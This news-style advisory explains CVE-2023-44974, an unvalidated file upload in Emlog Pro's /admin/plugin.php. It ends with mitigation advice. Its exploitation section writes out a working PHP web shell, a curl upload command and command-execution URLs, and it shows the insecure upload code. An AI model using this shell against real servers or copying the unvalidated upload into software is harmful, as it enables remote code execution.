CVE CyberSecurity Database News

CVE-2023-44974 - Arbitrary File Upload & Code Execution in Emlog Pro v2.2.

Poster -

In October 2023, a critical security vulnerability—CVE-2023-44974—was discovered in the blogging platform Emlog Pro v2.2.. This flaw allows any attacker to upload arbitrary files, including malicious PHP scripts, via the /admin/plugin.php component. Exploiting this bug, a hacker can easily gain remote code execution on the web server. This guide details how the vulnerability works, shows how to exploit it, and offers mitigation advice.

What is Emlog Pro?

Emlog is a popular open-source PHP-based blog and CMS. Version 2.2. has been affected by this vulnerability, putting many websites at risk.

How Does the Vulnerability Work?

The vulnerable code doesn't properly validate or restrict file uploads on the /admin/plugin.php endpoint. Instead of filtering out potentially harmful files (like .php), it lets users upload any file—including executable PHP scripts—into a directory that the webserver can access.

Once a malicious PHP file is uploaded, the attacker can open it in a web browser and execute arbitrary code on the server.

Here is a pseudocode snippet demonstrating the kind of insecure PHP logic that leads to this flaw

// plugin.php
if(isset($_FILES['file'])){
    $upload_dir = '../content/plugins/';
    $filename = $_FILES['file']['name'];
    $tmp_name = $_FILES['file']['tmp_name'];
    
    // NO validation!
    move_uploaded_file($tmp_name, $upload_dir . $filename);
    echo "File uploaded!";
}

Step-by-Step Exploitation

Let's see how an attacker would exploit this vulnerability.

Create a simple PHP shell (e.g., shell.php)

<?php
if(isset($_GET['cmd'])){
    system($_GET['cmd']);
}
?>

This tiny script will run any command passed as ?cmd= in the URL.

Use curl to send the file to the vulnerable website

curl -F "file=@shell.php" http://target-site.com/admin/plugin.php

If the site responds with "File uploaded!" the attack worked.

Now visit the uploaded file

http://target-site.com/content/plugins/shell.php?cmd=whoami

The server responds with its username, proving code execution.

Here's a one-liner exploit payload using curl

curl -F "file=@shell.php" http://target-site.com/admin/plugin.php
# Now access: http://target-site.com/content/plugins/shell.php?cmd=ls

Mitigation

- Upgrade: Ensure your Emlog installation is updated to the latest version. Check the Emlog official download page.

Input Validation: Always check file types and extensions server-side.

- Restrict Upload Folders: Prevent .php files from being uploaded or executed in content folders.
- Authentication: Require admin authentication for sensitive endpoints like /admin/plugin.php.

Additional Resources

- Emlog Official Site
- CVE Details for CVE-2023-44974
- Exploit Database – Emlog Arbitrary File Upload

Summary

CVE-2023-44974 is dangerously simple to exploit: upload a php file via the insecure /admin/plugin.php, then access it via the web. Anyone running Emlog Pro v2.2. or older should patch immediately to close this critical security hole. Always sanitize file uploads and limit permissions on directories that handle user files.

Timeline

Published on: 10/03/2023 21:15:10 UTC
Last modified on: 10/05/2023 15:17:48 UTC